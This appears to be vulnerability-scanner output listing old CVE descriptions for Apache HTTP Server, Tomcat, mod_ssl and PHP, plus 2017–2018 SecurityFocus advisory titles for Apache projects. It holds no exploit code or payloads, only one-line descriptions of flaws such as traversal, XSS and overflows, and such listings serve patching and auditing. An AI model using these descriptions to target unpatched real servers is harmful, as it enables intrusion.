| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
14515| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
14516| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
14517| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
14518| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
14519| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
14520| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
14521| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
14522| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
14523| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
14524| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
14525| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
14526| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
14527| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
14528| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
14529| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
14530| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
14531| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
14532| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
14533| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
14534| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
14535| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
